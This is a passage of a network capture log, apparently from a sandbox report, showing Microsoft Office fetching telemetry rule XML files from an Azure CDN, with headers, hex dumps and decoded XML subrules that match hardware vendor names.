                                                                                                                                    x-azure-ref: 20241105T080312Z-157b9fd754fgw9r7hC1SN1124c00000004a000000000202x
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:12 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    15192.168.2.44977613.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:12 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:12 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 2160
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                    ETag: "0x8DC582BA3B95D81"
                                                                                                                                    x-ms-request-id: d78ce712-d01e-007a-194f-2ef38c000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080312Z-158dbd74bf4zb6hghC1SN1dd7n00000003n0000000006fxx
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:12 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    16192.168.2.44977913.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:13 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:13 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 474
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                    ETag: "0x8DC582B9964B277"
                                                                                                                                    x-ms-request-id: 7b71120f-601e-0050-0560-2e2c9c000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080313Z-157b9fd754fl8n64hC1SN1x39s00000001600000000063yx
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:13 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    17192.168.2.44978213.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:13 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:13 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 632
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                    ETag: "0x8DC582BB6E3779E"
                                                                                                                                    x-ms-request-id: 94eba7f5-101e-0079-455c-2e5913000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080313Z-157b9fd754fgw9r7hC1SN1124c000000048g000000003g7d
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:13 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    18192.168.2.44978113.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:13 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:13 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 471
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                    ETag: "0x8DC582BB10C598B"
                                                                                                                                    x-ms-request-id: 00beaf03-101e-0065-2c60-2e4088000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080313Z-158dbd74bf4hnrcphC1SN1f41800000003ng00000000221x
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:13 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    19192.168.2.44978013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:13 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:13 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 415
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                    ETag: "0x8DC582B9F6F3512"
                                                                                                                                    x-ms-request-id: 2b307645-e01e-001f-335c-2e1633000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080313Z-158dbd74bf4cgkpvhC1SN11r4000000003q0000000000xyt
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:13 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    20192.168.2.44978313.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:13 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:13 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 467
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                    ETag: "0x8DC582BA6C038BC"
                                                                                                                                    x-ms-request-id: e9380aa8-701e-005c-5160-2ebb94000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080313Z-158dbd74bf4sq2b7hC1SN1zzdg00000003sg0000000022s7
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:13 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    21192.168.2.44978513.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:14 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:14 UTC471INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:14 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 486
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                    ETag: "0x8DC582BB344914B"
                                                                                                                                    x-ms-request-id: 1b94f42b-e01e-000c-2959-2f8e36000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080314Z-158dbd74bf4cvrq6hC1SN1zhyc00000003ng000000002k41
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_MISS
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:14 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    22192.168.2.44978413.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:14 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:14 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 407
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                                                                                    x-ms-request-id: c0039004-a01e-0070-7e5f-2e573b000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080314Z-157b9fd754fkww8mhC1SN1eg40000000042g0000000043d6
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:14 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    23192.168.2.44978613.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:14 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:14 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 427
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                    ETag: "0x8DC582BA310DA18"
                                                                                                                                    x-ms-request-id: ea0f8f90-301e-0020-7758-2e6299000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080314Z-157b9fd754f8vn5phC1SN10bks000000043g000000004m83
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:14 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    24192.168.2.44978713.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:14 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:14 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 486
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                    ETag: "0x8DC582B9018290B"
                                                                                                                                    x-ms-request-id: 38302bdf-e01e-0052-3b4a-2ed9df000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080314Z-158dbd74bf4sq2b7hC1SN1zzdg00000003rg0000000030rt
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
